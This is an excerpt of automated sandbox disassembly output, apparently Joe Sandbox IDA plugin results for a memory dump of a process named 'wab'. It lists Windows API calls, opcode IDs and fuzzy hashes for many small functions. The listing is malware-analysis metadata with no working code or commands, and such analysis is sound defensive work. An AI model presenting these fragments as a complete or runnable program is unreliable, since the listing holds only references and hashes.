                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                                                          • Opcode ID: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                                                          • Opcode ID: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                                          • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1171893557-0
                                                                                                                                                                                                                          • Opcode ID: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                          • String ID: sqlite_master
                                                                                                                                                                                                                          • API String ID: 438689982-3163232059
                                                                                                                                                                                                                          • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                                                          • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 822687973-0
                                                                                                                                                                                                                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7652DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7652DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                                                          • Opcode ID: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3727323765-0
                                                                                                                                                                                                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                                                          • Opcode ID: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2754987064-0
